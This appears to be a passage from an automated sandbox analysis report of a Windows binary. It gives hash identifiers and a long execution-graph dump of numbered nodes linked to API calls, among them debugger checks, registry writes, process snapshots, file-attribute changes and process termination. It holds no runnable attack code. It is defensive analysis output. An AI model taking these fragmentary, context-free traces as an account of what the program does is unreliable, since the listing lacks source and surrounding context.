                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: FindHandleModuleResource
                                        • String ID: RTL
                                        • API String ID: 3537982541-834975271
                                        • Opcode ID: 8f301c717f845a26e019ee801062374c616f8bb3a69ad018d8f9c289e236306c
                                        • Instruction ID: 13861e3d394c5fb476f3d03290887a2f21c0f4aff4606b29863db7b5109d879f
                                        • Opcode Fuzzy Hash: 8f301c717f845a26e019ee801062374c616f8bb3a69ad018d8f9c289e236306c
                                        • Instruction Fuzzy Hash: 41C0803175071097E73417717C0DB432D585F17B15F15045CB505990C0DDE5D4508BD0

                                        Execution Graph

                                        Execution Coverage:3.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:2.5%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:65
6feb68 92440 71019b 8 API calls 92434->92440 92442 6fea85 __fread_nolock 92435->92442 92448 6feb1a 92437->92448 92438 71016b 8 API calls 92438->92444 92439->92442 92450 6fead9 ISource __fread_nolock 92440->92450 92441 71016b 8 API calls 92443 6feaa6 92441->92443 92442->92441 92442->92443 92443->92450 92456 6fd210 254 API calls 92443->92456 92444->92425 92444->92427 92444->92428 92444->92431 92444->92434 92444->92438 92444->92450 92446 743156 92460 763ef6 81 API calls __wsopen_s 92446->92460 92448->92412 92450->92429 92450->92446 92450->92448 92451 743131 92450->92451 92453 74310f 92450->92453 92457 6f4485 254 API calls 92450->92457 92459 763ef6 81 API calls __wsopen_s 92451->92459 92458 763ef6 81 API calls __wsopen_s 92453->92458 92455->92413 92456->92450 92457->92450 92458->92448 92459->92448 92460->92448 92461->92425 92462->92427 92463 71078b 92464 710797 ___BuildCatchObject 92463->92464 92493 710241 92464->92493 92466 71079e 92467 7108f1 92466->92467 92470 7107c8 92466->92470 92534 710bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 92467->92534 92469 7108f8 92527 7151e2 92469->92527 92482 710807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 92470->92482 92504 72280d 92470->92504 92477 7107e7 92479 710868 92512 710ce9 92479->92512 92481 71086e 92516 6f32a2 92481->92516 92482->92479 92530 7151aa 38 API calls 2 library calls 92482->92530 92487 71088a 92487->92469 92488 71088e 92487->92488 92489 710897 92488->92489 92532 715185 28 API calls _abort 92488->92532 92533 7103d0 13 API calls 2 library calls 92489->92533 92492 71089f 92492->92477 92494 71024a 92493->92494 92536 710a28 IsProcessorFeaturePresent 92494->92536 92496 710256 92537 713024 10 API calls 3 library calls 92496->92537 92498 71025b 92499 71025f 92498->92499 92538 7226a7 92498->92538 92499->92466 92502 710276 92502->92466 92505 722824 92504->92505 92506 710e1c 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 92505->92506 92507 7107e1 92506->92507 92507->92477 92508 7227b1 92507->92508 92509 7227e0 92508->92509 92510 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 92509->92510 92511 722809 92510->92511 92511->92482 92589 7126d0 92512->92589 92515 710d0f 92515->92481 92517 6f32ae IsThemeActive 92516->92517 92518 6f3309 92516->92518 92591 7152d3 92517->92591 92531 710d22 GetModuleHandleW 92518->92531 92520 6f32d9 92597 715339 92520->92597 92522 6f32e0 92604 6f326d SystemParametersInfoW SystemParametersInfoW 92522->92604 92524 6f32e7 92605 6f3312 92524->92605 93635 714f5f 92527->93635 92530->92479 92531->92487 92532->92489 92533->92492 92534->92469 92536->92496 92537->92498 92542 72d596 92538->92542 92541 71304d 8 API calls 3 library calls 92541->92499 92545 72d5b3 92542->92545 92546 72d5af 92542->92546 92544 710268 92544->92502 92544->92541 92545->92546 92548 724f8b 92545->92548 92560 710e1c 92546->92560 92549 724f97 ___BuildCatchObject 92548->92549 92567 7232ee EnterCriticalSection 92549->92567 92551 724f9e 92568 72543f 92551->92568 92553 724fad 92559 724fbc 92553->92559 92581 724e1f 29 API calls 92553->92581 92556 724fcd __fread_nolock 92556->92545 92557 724fb7 92582 724ed5 GetStdHandle GetFileType 92557->92582 92583 724fd8 LeaveCriticalSection _abort 92559->92583 92561 710e25 92560->92561 92562 710e27 IsProcessorFeaturePresent 92560->92562 92561->92544 92564 710fee 92562->92564 92588 710fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92564->92588 92566 7110d1 92566->92544 92567->92551 92569 72544b ___BuildCatchObject 92568->92569 92570 725458 92569->92570 92571 72546f 92569->92571 92585 71f669 20 API calls _abort 92570->92585 92584 7232ee EnterCriticalSection 92571->92584 92574 72545d 92586 722b7c 26 API calls _abort 92574->92586 92576 7254a7 92587 7254ce LeaveCriticalSection _abort 92576->92587 92577 725467 __fread_nolock 
92577->92553 92579 725390 __wsopen_s 21 API calls 92580 72547b 92579->92580 92580->92576 92580->92579 92581->92557 92582->92559 92583->92556 92584->92580 92585->92574 92586->92577 92587->92577 92588->92566 92590 710cfc GetStartupInfoW 92589->92590 92590->92515 92592 7152df ___BuildCatchObject 92591->92592 92654 7232ee EnterCriticalSection 92592->92654 92594 7152ea pre_c_initialization 92655 71532a 92594->92655 92596 71531f __fread_nolock 92596->92520 92598 715345 92597->92598 92599 71535f 92597->92599 92598->92599 92659 71f669 20 API calls _abort 92598->92659 92599->92522 92601 71534f 92660 722b7c 26 API calls _abort 92601->92660 92603 71535a 92603->92522 92604->92524 92606 6f3322 __wsopen_s 92605->92606 92607 6fbf07 8 API calls 92606->92607 92608 6f332e GetCurrentDirectoryW 92607->92608 92661 6f4f60 92608->92661 92610 6f3355 IsDebuggerPresent 92611 6f3363 92610->92611 92612 733c7d MessageBoxA 92610->92612 92613 733c95 92611->92613 92614 6f3377 92611->92614 92612->92613 92767 6f40e0 92613->92767 92729 6f3a1c 92614->92729 92621 6f33e9 92623 733cc6 SetCurrentDirectoryW 92621->92623 92624 6f33f1 92621->92624 92623->92624 92625 6f33fc 92624->92625 92775 751ef3 AllocateAndInitializeSid CheckTokenMembership FreeSid 92624->92775 92761 6f345a 7 API calls 92625->92761 92629 733ce1 92629->92625 92631 733cf3 92629->92631 92633 6f551b 10 API calls 92631->92633 92654->92594 92658 723336 LeaveCriticalSection 92655->92658 92657 715331 92657->92596 92658->92657 92659->92601 92660->92603 92662 6fbf07 8 API calls 92661->92662 92663 6f4f76 92662->92663 92776 6f60f5 92663->92776 92665 6f4f94 92666 6fbceb 8 API calls 92665->92666 92667 6f4fa8 92666->92667 92668 6fbe6d 8 API calls 92667->92668 92669 6f4fb3 92668->92669 92790 6f88e8 92669->92790 92672 6fb25f 8 API calls 92673 6f4fcc 92672->92673 92674 6fbdc1 39 API calls 92673->92674 92675 6f4fdc 92674->92675 92676 6fb25f 8 API calls 92675->92676 92677 6f5002 92676->92677 92678 6fbdc1 39 API calls 92677->92678 92679 6f5011 92678->92679 
92680 6fbf07 8 API calls 92679->92680 92681 6f502f 92680->92681 92793 6f5151 92681->92793 92685 6f5049 92686 6f5053 92685->92686 92687 734afd 92685->92687 92689 714db8 40 API calls 92686->92689 92688 6f5151 8 API calls 92687->92688 92690 734b11 92688->92690 92691 6f505e 92689->92691 92693 6f5151 8 API calls 92690->92693 92691->92690 92692 6f5068 92691->92692 92694 714db8 40 API calls 92692->92694 92695 734b2d 92693->92695 92696 6f5073 92694->92696 92698 6f551b 10 API calls 92695->92698 92696->92695 92697 6f507d 92696->92697 92699 714db8 40 API calls 92697->92699 92700 734b50 92698->92700 92701 6f5088 92699->92701 92704 6f5151 8 API calls 92700->92704 92702 734b79 92701->92702 92703 6f5092 92701->92703 92706 6f5151 8 API calls 92702->92706 92705 6f50b5 92703->92705 92708 6fbe6d 8 API calls 92703->92708 92707 734b5c 92704->92707 92710 734bb4 92705->92710 92809 6f7d51 92705->92809 92709 734b97 92706->92709 92711 6fbe6d 8 API calls 92707->92711 92712 6f50a8 92708->92712 92713 6fbe6d 8 API calls 92709->92713 92715 734b6a 92711->92715 92716 6f5151 8 API calls 92712->92716 92717 734ba5 92713->92717 92719 6f5151 8 API calls 92715->92719 92716->92705 92720 6f5151 8 API calls 92717->92720 92719->92702 92720->92710 92724 6f88e8 8 API calls 92726 6f50ee 92724->92726 92725 6f8a10 8 API calls 92725->92726 92726->92724 92726->92725 92727 6f5132 92726->92727 92728 6f5151 8 API calls 92726->92728 92727->92610 92728->92726 92730 6f3a29 __wsopen_s 92729->92730 92731 7340b4 ___scrt_fastfail 92730->92731 92732 6f3a42 92730->92732 92734 7340d0 GetOpenFileNameW 92731->92734 92733 6f557e 9 API calls 92732->92733 92735 6f3a4b 92733->92735 92736 73411f 92734->92736 92842 6f39de 92735->92842 92738 6f84b7 8 API calls 92736->92738 92740 734134 92738->92740 92740->92740 93634 6f35ab 7 API calls 92761->93634 92763 6f3401 92768 6f40ee 92767->92768 92769 6f4145 92767->92769 92771 6f40ff 92768->92771 92772 71016b 8 API calls 92768->92772 92770 71016b 8 API calls 92769->92770 92770->92771 92773 
6f4154 8 API calls 92771->92773 92772->92771 92774 6f4116 92773->92774 92774->92621 92775->92629 92777 6f6102 __wsopen_s 92776->92777 92778 6f84b7 8 API calls 92777->92778 92779 6f6134 92777->92779 92778->92779 92789 6f616a 92779->92789 92831 6f627c 92779->92831 92781 6fb25f 8 API calls 92782 6f6261 92781->92782 92785 6f684e 8 API calls 92782->92785 92783 6fb25f 8 API calls 92783->92789 92784 6f627c 8 API calls 92784->92789 92786 6f626d 92785->92786 92786->92665 92787 6f684e 8 API calls 92787->92789 92788 6f6238 92788->92781 92788->92786 92789->92783 92789->92784 92789->92787 92789->92788 92791 71016b 8 API calls 92790->92791 92792 6f4fbf 92791->92792 92792->92672 92794 6f515b 92793->92794 92795 6f5179 92793->92795 92796 6f503b 92794->92796 92798 6fbe6d 8 API calls 92794->92798 92797 6f84b7 8 API calls 92795->92797 92799 714db8 92796->92799 92797->92796 92798->92796 92800 714dc6 92799->92800 92801 714e3b 92799->92801 92804 714deb 92800->92804 92834 71f669 20 API calls _abort 92800->92834 92836 714e4d 40 API calls 3 library calls 92801->92836 92803 714e48 92803->92685 92804->92685 92806 714dd2 92835 722b7c 26 API calls _abort 92806->92835 92808 714ddd 92808->92685 92810 6f7d59 92809->92810 92811 71016b 8 API calls 92810->92811 92812 6f7d67 92811->92812 92837 6f8386 92812->92837 92815 6f83b0 92816 6fc700 8 API calls 92815->92816 92817 6f83c0 92816->92817 92818 71019b 8 API calls 92817->92818 92819 6f50d3 92817->92819 92818->92819 92820 6f8a10 92819->92820 92821 6f8a26 92820->92821 92822 736728 92821->92822 92828 6f8a30 92821->92828 92840 70b71c 8 API calls 92822->92840 92823 736735 92841 6fb3fe 8 API calls 92823->92841 92826 6f8b4b 92826->92726 92827 736753 92827->92827 92828->92823 92828->92826 92829 6f8b44 92828->92829 92830 71016b 8 API calls 92829->92830 92830->92826 92832 6fc269 8 API calls 92831->92832 92833 6f6287 92832->92833 92833->92779 92834->92806 92835->92808 92836->92803 92838 71016b 8 API calls 92837->92838 92839 6f50c5 92838->92839 92839->92815 
92840->92823 92841->92827 92843 7322f0 __wsopen_s 92842->92843 92844 6f39eb GetLongPathNameW 92843->92844 92845 6f84b7 8 API calls 92844->92845 92846 6f3a13 92845->92846 92847 6f5379 92846->92847 93634->92763 93636 714f6b _abort 93635->93636 93637 714f72 93636->93637 93638 714f84 93636->93638 93674 7150b9 GetModuleHandleW 93637->93674 93659 7232ee EnterCriticalSection 93638->93659 93641 714f77 93641->93638 93675 7150fd GetModuleHandleExW 93641->93675 93642 715029 93663 715069 93642->93663 93646 715000 93651 715018 93646->93651 93656 7227b1 _abort 5 API calls 93646->93656 93648 714f8b 93648->93642 93648->93646 93660 722538 93648->93660 93649 715072 93683 7320c9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 93649->93683 93650 715046 93666 715078 93650->93666 93652 7227b1 _abort 5 API calls 93651->93652 93652->93642 93656->93651 93659->93648 93684 722271 93660->93684 93703 723336 LeaveCriticalSection 93663->93703 93665 715042 93665->93649 93665->93650 93704 72399c 93666->93704 93669 7150a6 93672 7150fd _abort 8 API calls 93669->93672 93670 715086 GetPEB 93670->93669 93671 715096 GetCurrentProcess TerminateProcess 93670->93671 93671->93669 93673 7150ae ExitProcess 93672->93673 93674->93641 93676 715127 GetProcAddress 93675->93676 93677 71514a 93675->93677 93680 71513c 93676->93680 93678 715150 FreeLibrary 93677->93678 93679 715159 93677->93679 93678->93679 93681 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 93679->93681 93680->93677 93682 714f83 93681->93682 93682->93638 93687 722220 93684->93687 93686 722295 93686->93646 93688 72222c ___BuildCatchObject 93687->93688 93695 7232ee EnterCriticalSection 93688->93695 93690 72223a 93696 7222c1 93690->93696 93694 722258 __fread_nolock 93694->93686 93695->93690 93697 7222e1 93696->93697 93698 7222e9 93696->93698 93699 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 93697->93699 93698->93697 93701 722d58 _free 20 API calls 93698->93701 93700 722247 
93699->93700 93702 722265 LeaveCriticalSection _abort 93700->93702 93701->93697 93702->93694 93703->93665 93705 7239c1 93704->93705 93706 7239b7 93704->93706 93711 723367 5 API calls 2 library calls 93705->93711 93708 710e1c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 93706->93708 93710 715082 93708->93710 93709 7239d8 93709->93706 93710->93669 93710->93670 93711->93709 93712 741a68 93713 741a70 93712->93713 93716 6fd4e5 93712->93716 93750 7579af 8 API calls __fread_nolock 93713->93750 93715 741a82 93751 757928 8 API calls __fread_nolock 93715->93751 93718 71016b 8 API calls 93716->93718 93720 6fd539 93718->93720 93719 741aac 93721 7002f0 254 API calls 93719->93721 93742 6fc2cd 93720->93742 93722 741ad3 93721->93722 93724 741ae7 93722->93724 93752 7760a2 53 API calls _wcslen 93722->93752 93726 741b04 93726->93716 93753 7579af 8 API calls __fread_nolock 93726->93753 93728 71016b 8 API calls 93734 6fd61e ISource 93728->93734 93730 6fc34b 8 API calls 93740 6fd95c ISource 93730->93740 93731 6fbe6d 8 API calls 93731->93734 93734->93731 93735 741f1c 93734->93735 93736 741f37 93734->93736 93738 6fc34b 8 API calls 93734->93738 93739 6fd8c1 ISource 93734->93739 93754 6fb3fe 8 API calls 93734->93754 93755 7555d9 8 API calls ISource 93735->93755 93738->93734 93739->93730 93739->93740 93741 6fd973 93740->93741 93749 70e284 8 API calls ISource 93740->93749 93746 6fc2dd 93742->93746 93743 6fc2e5 93743->93728 93744 71016b 8 API calls 93744->93746 93745 6fbf07 8 API calls 93745->93746 93746->93743 93746->93744 93746->93745 93747 6fbe6d 8 API calls 93746->93747 93748 6fc2cd 8 API calls 93746->93748 93747->93746 93748->93746 93749->93740 93750->93715 93751->93719 93752->93726 93753->93726 93754->93734 93755->93736 93756 6f1033 93761 6f6686 93756->93761 93760 6f1042 93762 6fbf07 8 API calls 93761->93762 93763 6f66f4 93762->93763 93769 6f55cc 93763->93769 93766 6f6791 93767 6f1038 93766->93767 93772 6f68e6 8 API calls __fread_nolock 93766->93772 93768 710433 29 
API calls __onexit 93767->93768 93768->93760 93773 6f55f8 93769->93773 93772->93766 93774 6f55eb 93773->93774 93775 6f5605 93773->93775 93774->93766 93775->93774 93776 6f560c RegOpenKeyExW 93775->93776 93776->93774 93777 6f5626 RegQueryValueExW 93776->93777 93778 6f565c RegCloseKey 93777->93778 93779 6f5647 93777->93779 93778->93774 93779->93778 93780 70230c 93781 702315 __fread_nolock 93780->93781 93783 747487 93781->93783 93786 702366 93781->93786 93787 71016b 8 API calls 93781->93787 93790 701fa7 __fread_nolock 93781->93790 93791 71019b 8 API calls 93781->93791 93792 6f8e70 93781->93792 93815 6f662b 8 API calls __fread_nolock 93783->93815 93785 747493 93789 6fbe6d 8 API calls 93785->93789 93785->93790 93788 6f7cb3 8 API calls 93786->93788 93787->93781 93788->93790 93789->93790 93791->93781 93793 6f8e85 93792->93793 93794 6f8e82 93792->93794 93795 6f8e8d 93793->93795 93796 6f8ebb 93793->93796 93794->93781 93816 715556 26 API calls 93795->93816 93798 736b10 93796->93798 93801 6f8ecd 93796->93801 93806 736a29 93796->93806 93819 715513 26 API calls 93798->93819 93799 6f8e9d 93805 71016b 8 API calls 93799->93805 93817 70fe8f 51 API calls 93801->93817 93802 736b28 93802->93802 93807 6f8ea7 93805->93807 93808 736aa2 93806->93808 93810 71019b 8 API calls 93806->93810 93809 6fb25f 8 API calls 93807->93809 93818 70fe8f 51 API calls 93808->93818 93809->93794 93811 736a72 93810->93811 93812 71016b 8 API calls 93811->93812 93813 736a99 93812->93813 93814 6fb25f 8 API calls 93813->93814 93814->93808 93815->93785 93816->93799 93817->93799 93818->93798 93819->93802 93820 6ff470 93823 709fa5 93820->93823 93822 6ff47c 93824 709fc6 93823->93824 93829 70a023 93823->93829 93826 7002f0 254 API calls 93824->93826 93824->93829 93830 709ff7 93826->93830 93827 74800f 93827->93827 93828 70a067 93828->93822 93829->93828 93832 763ef6 81 API calls __wsopen_s 93829->93832 93830->93828 93830->93829 93831 6fbe6d 8 API calls 93830->93831 93831->93829 93832->93827 93833 700e6f 93834 700e83 
93833->93834 93839 7013d5 93833->93839 93835 700e95 93834->93835 93836 71016b 8 API calls 93834->93836 93837 7455d0 93835->93837 93840 700eee 93835->93840 93935 6fb3fe 8 API calls 93835->93935 93836->93835 93936 761a29 8 API calls 93837->93936 93839->93835 93843 6fbe6d 8 API calls 93839->93843 93859 70044d ISource 93840->93859 93866 702ad0 93840->93866 93843->93835 93844 7462cf 93940 763ef6 81 API calls __wsopen_s 93844->93940 93845 71016b 8 API calls 93864 700326 ISource 93845->93864 93846 701e00 40 API calls 93846->93864 93847 701645 93852 6fbe6d 8 API calls 93847->93852 93847->93859 93849 7461fe 93939 763ef6 81 API calls __wsopen_s 93849->93939 93850 6fbe6d 8 API calls 93850->93864 93851 745c7f 93856 6fbe6d 8 API calls 93851->93856 93851->93859 93852->93859 93856->93859 93857 7105d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93857->93864 93858 6fbf07 8 API calls 93858->93864 93860 7460b9 93937 763ef6 81 API calls __wsopen_s 93860->93937 93862 710433 29 API calls pre_c_initialization 93862->93864 93863 700a5e ISource 93938 763ef6 81 API calls __wsopen_s 93863->93938 93864->93844 93864->93845 93864->93846 93864->93847 93864->93849 93864->93850 93864->93851 93864->93857 93864->93858 93864->93859 93864->93860 93864->93862 93864->93863 93865 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 93864->93865 93934 701940 254 API calls 2 library calls 93864->93934 93865->93864 93867 702f70 93866->93867 93868 702b36 93866->93868 94236 7105d2 5 API calls __Init_thread_wait 93867->94236 93870 702b50 93868->93870 93871 747b7c 93868->93871 93874 7030e0 9 API calls 93870->93874 94241 7779f9 254 API calls 93871->94241 93873 702f7a 93876 702fbb 93873->93876 93879 6fb25f 8 API calls 93873->93879 93877 702b60 93874->93877 93875 747b88 93875->93864 93882 747b91 93876->93882 93883 702fec 93876->93883 93878 7030e0 9 API calls 93877->93878 93880 702b76 93878->93880 93886 702f94 
93879->93886 93880->93876 93881 702bac 93880->93881 93881->93882 93901 702bc8 __fread_nolock 93881->93901 94242 763ef6 81 API calls __wsopen_s 93882->94242 94238 6fb3fe 8 API calls 93883->94238 94237 710588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93886->94237 93887 747bb4 93887->93864 93888 702ff9 94239 70e662 254 API calls 93888->94239 93891 747bb9 94243 763ef6 81 API calls __wsopen_s 93891->94243 93893 747c1c 94245 7760a2 53 API calls _wcslen 93893->94245 93894 702cfc 93896 7030e0 9 API calls 93894->93896 93897 702d09 93896->93897 93902 7030e0 9 API calls 93897->93902 93909 747d45 93897->93909 93898 71016b 8 API calls 93898->93901 93899 71019b 8 API calls 93899->93901 93900 703032 94240 70fe59 8 API calls 93900->94240 93901->93887 93901->93888 93901->93891 93901->93898 93901->93899 93906 7002f0 254 API calls 93901->93906 93907 702cef 93901->93907 93908 747bfd 93901->93908 93904 702d23 93902->93904 93904->93909 93911 6fbe6d 8 API calls 93904->93911 93914 702d87 ISource 93904->93914 93906->93901 93907->93893 93907->93894 94244 763ef6 81 API calls __wsopen_s 93908->94244 93909->93887 94246 763ef6 81 API calls __wsopen_s 93909->94246 93911->93914 93912 7030e0 9 API calls 93912->93914 93913 702edd 93913->93864 93914->93887 93914->93900 93914->93909 93914->93912 93916 702e3b ISource 93914->93916 93930 6f7953 CloseHandle 93914->93930 93941 7695f6 93914->93941 93956 77ecc9 93914->93956 93961 77ac49 93914->93961 93966 7665b4 93914->93966 93971 77cd16 93914->93971 94060 77a4b4 93914->94060 94066 764ad5 93914->94066 94071 70be75 93914->94071 94128 76874a 93914->94128 94155 765ed5 93914->94155 94185 768e39 93914->94185 94204 70f95e 93914->94204 94211 766561 93914->94211 94218 75e9c5 GetFileAttributesW 93914->94218 94220 766d2d 93914->94220 94233 779eea 93914->94233 93915 70e29c 8 API calls 93915->93916 93916->93913 93916->93915 93930->93914 93934->93864 93935->93835 93936->93859 93937->93863 93938->93859 93939->93859 93940->93859 93942 6fbf07 8 API 
calls 93941->93942 93943 769607 93942->93943 93944 6f8e70 52 API calls 93943->93944 93945 769616 93944->93945 93946 6f557e 9 API calls 93945->93946 93947 769621 93946->93947 93948 6f8e70 52 API calls 93947->93948 93949 76962e 93948->93949 93950 6f8e70 52 API calls 93949->93950 93951 769640 93950->93951 93952 6f8e70 52 API calls 93951->93952 93953 769655 WritePrivateProfileStringW 93952->93953 93954 769677 93953->93954 93955 76966b WritePrivateProfileStringW 93953->93955 93954->93914 93955->93954 94247 759b57 93956->94247 93958 77ecd5 94266 6f7a59 8 API calls 93958->94266 93960 77ecf1 93960->93914 93962 6f8e70 52 API calls 93961->93962 93963 77ac65 93962->93963 94274 75dc9c CreateToolhelp32Snapshot Process32FirstW 93963->94274 93965 77ac74 93965->93914 93967 6f8e70 52 API calls 93966->93967 93968 7665c7 93967->93968 94292 75e387 lstrlenW 93968->94292 93970 7665d1 93970->93914 93972 6fbf07 8 API calls 93971->93972 93973 77cd39 93972->93973 93974 6fbf07 8 API calls 93973->93974 93975 77cd42 93974->93975 93976 6fbf07 8 API calls 93975->93976 93977 77cd4b 93976->93977 93978 6f8e70 52 API calls 93977->93978 93981 77cdda 93977->93981 93979 77cd71 93978->93979 94297 77d6b1 93979->94297 93981->93914 93982 77cda5 94323 77d2f7 93982->94323 93984 77cdd6 93984->93981 93985 77ce0f RegConnectRegistryW 93984->93985 93986 77ce76 RegCreateKeyExW 93984->93986 93985->93981 93985->93986 93988 77cf0e 93986->93988 93997 77cead 93986->93997 93989 77d1d6 RegCloseKey 93988->93989 93990 6f8e70 52 API calls 93988->93990 93989->93981 93991 77d1e9 RegCloseKey 93989->93991 93992 77cf29 93990->93992 93991->93981 93993 714db8 40 API calls 93992->93993 93994 77cf38 93993->93994 93995 77cf96 93994->93995 93996 77cf44 93994->93996 94000 6f8e70 52 API calls 93995->94000 93998 6f8e70 52 API calls 93996->93998 93997->93981 93999 77ceff RegCloseKey 93997->93999 94001 77cf4e _wcslen 93998->94001 93999->93981 94002 77cfa0 94000->94002 94007 6f8e70 52 API calls 94001->94007 94003 714db8 40 API calls 
94002->94003 94004 77cfaf 94003->94004 94005 77d047 94004->94005 94006 77cfbf 94004->94006 94008 6f8e70 52 API calls 94005->94008 94009 6f8e70 52 API calls 94006->94009 94010 77cf70 94007->94010 94011 77d051 94008->94011 94012 77cfc9 _wcslen 94009->94012 94013 6f8e70 52 API calls 94010->94013 94014 714db8 40 API calls 94011->94014 94019 6f8e70 52 API calls 94012->94019 94059 77cf85 94013->94059 94015 77d060 94014->94015 94017 77d156 94015->94017 94018 77d070 94015->94018 94016 77d2bb RegSetValueExW 94016->93989 94055 77d01f 94016->94055 94022 6f8e70 52 API calls 94017->94022 94020 6f8e70 52 API calls 94018->94020 94021 77cfeb 94019->94021 94024 77d07a 94020->94024 94025 6f8e70 52 API calls 94021->94025 94023 77d160 94022->94023 94026 714db8 40 API calls 94023->94026 94027 71019b 8 API calls 94024->94027 94028 77d000 RegSetValueExW 94025->94028 94029 77d16f 94026->94029 94030 77d09f 94027->94030 94028->93989 94028->94055 94031 77d215 94029->94031 94032 77d17f 94029->94032 94033 6f8e70 52 API calls 94030->94033 94035 6f8e70 52 API calls 94031->94035 94333 6fc92d 94032->94333 94046 77d0b4 94033->94046 94037 77d21f 94035->94037 94036 77d187 94038 6f8e70 52 API calls 94036->94038 94039 714db8 40 API calls 94037->94039 94040 77d198 RegSetValueExW 94038->94040 94041 77d22e 94039->94041 94040->93989 94040->94055 94044 77d265 94041->94044 94045 77d23a 94041->94045 94042 6f8e70 52 API calls 94048 77d106 RegSetValueExW 94042->94048 94047 6f8e70 52 API calls 94044->94047 94338 6fc5df 39 API calls 94045->94338 94046->94042 94050 77d26f 94047->94050 94048->94055 94052 714db8 40 API calls 94050->94052 94051 77d242 94053 6f8e70 52 API calls 94051->94053 94054 77d27e 94052->94054 94053->94040 94054->94055 94339 76276a 10 API calls 94054->94339 94055->93989 94057 77d296 94058 6f8e70 52 API calls 94057->94058 94058->94059 94059->94016 94064 77a4c7 94060->94064 94061 6f8e70 52 API calls 94062 77a534 94061->94062 94341 7617be 94062->94341 94064->94061 94065 77a4d6 94064->94065 
94065->93914 94067 6f8e70 52 API calls 94066->94067 94068 764ae8 94067->94068 94382 75da81 94068->94382 94070 764af0 94070->93914 94394 6f6ab6 94071->94394 94074 71016b 8 API calls 94076 70bea6 94074->94076 94077 71019b 8 API calls 94076->94077 94079 70beb7 94077->94079 94078 748f7a 94118 70bf1f 94078->94118 94427 76a607 39 API calls 94078->94427 94080 6f7953 CloseHandle 94079->94080 94081 70bec2 94080->94081 94083 6fbf07 8 API calls 94081->94083 94082 6fc92d 39 API calls 94084 748fdc 94082->94084 94085 70beca 94083->94085 94086 748fe4 94084->94086 94087 70bf2c 94084->94087 94088 6f7953 CloseHandle 94085->94088 94090 6fc92d 39 API calls 94086->94090 94089 70fdc9 3 API calls 94087->94089 94091 70bed1 94088->94091 94095 70bf33 94089->94095 94090->94095 94092 6f8e70 52 API calls 94091->94092 94093 70bedd 94092->94093 94094 6f7953 CloseHandle 94093->94094 94096 70bee7 94094->94096 94097 748ff9 94095->94097 94098 70bf4e 94095->94098 94100 6f6e52 5 API calls 94096->94100 94099 71019b 8 API calls 94097->94099 94101 6f7a14 8 API calls 94098->94101 94103 748ffe 94099->94103 94104 70bef8 94100->94104 94102 70bf56 94101->94102 94408 70bfbc 94102->94408 94108 749012 94103->94108 94110 6f41c9 2 API calls 94103->94110 94105 70bf00 94104->94105 94106 748f72 94104->94106 94113 6f6b12 13 API calls 94105->94113 94426 6f7923 CloseHandle ISource 94106->94426 94116 749016 __fread_nolock 94108->94116 94428 761759 8 API calls ___scrt_fastfail 94108->94428 94109 70bf65 94109->94116 94423 6f7a59 8 API calls 94109->94423 94110->94108 94115 70bf0e 94113->94115 94422 6f6afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 94115->94422 94118->94082 94118->94087 94119 70bf79 94122 70bfb3 94119->94122 94123 6f7953 CloseHandle 94119->94123 94120 70bf15 94120->94118 94121 748f3b 94120->94121 94425 75d4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 94121->94425 94122->93914 94125 70bfa7 94123->94125 94125->94122 94424 6f7923 CloseHandle ISource 94125->94424 94126 748f52 
94126->94118 94129 76875a __wsopen_s 94128->94129 94130 6f8e70 52 API calls 94129->94130 94131 76877b 94130->94131 94132 768799 94131->94132 94133 6fc92d 39 API calls 94131->94133 94134 6f8e70 52 API calls 94132->94134 94147 768973 94132->94147 94133->94132 94135 76887c 94134->94135 94136 6f557e 9 API calls 94135->94136 94137 7688a7 94136->94137 94457 71d913 94137->94457 94139 7688cd 94140 7688f7 GetCurrentDirectoryW SetCurrentDirectoryW 94139->94140 94141 768921 94140->94141 94140->94147 94142 75e387 4 API calls 94141->94142 94143 76892a 94142->94143 94144 75e9c5 GetFileAttributesW 94143->94144 94143->94147 94145 768938 94144->94145 94146 768940 GetFileAttributesW SetFileAttributesW 94145->94146 94153 7689cb 94145->94153 94148 7689b1 94146->94148 94149 768969 SetCurrentDirectoryW 94146->94149 94147->93914 94150 7689b5 SetCurrentDirectoryW 94148->94150 94151 768a02 SetCurrentDirectoryW 94148->94151 94149->94147 94150->94153 94151->94147 94460 769f9f FindFirstFileW 94153->94460 94154 7689ea 94154->94151 94156 765ef4 94155->94156 94157 765fbd 94155->94157 94158 6fc92d 39 API calls 94156->94158 94160 6f8e70 52 API calls 94157->94160 94169 766011 94157->94169 94159 765eff 94158->94159 94161 6fc92d 39 API calls 94159->94161 94162 765fef 94160->94162 94163 765f15 94161->94163 94164 6f8e70 52 API calls 94162->94164 94163->94157 94166 6fbf07 8 API calls 94163->94166 94165 766001 94164->94165 94504 75d836 94165->94504 94168 765f26 94166->94168 94170 6fbf07 8 API calls 94168->94170 94169->93914 94171 765f2f 94170->94171 94172 6f8e70 52 API calls 94171->94172 94173 765f3c 94172->94173 94174 6f694e 8 API calls 94173->94174 94175 765f4f 94174->94175 94176 6f7af4 8 API calls 94175->94176 94177 765f60 94176->94177 94184 765f89 94177->94184 94547 75dc8e 94177->94547 94180 6fc92d 39 API calls 94180->94157 94181 6fb25f 8 API calls 94182 765f80 94181->94182 94183 75da81 12 API calls 94182->94183 94183->94184 94184->94180 94186 6fbf07 8 API calls 94185->94186 94187 768e4a 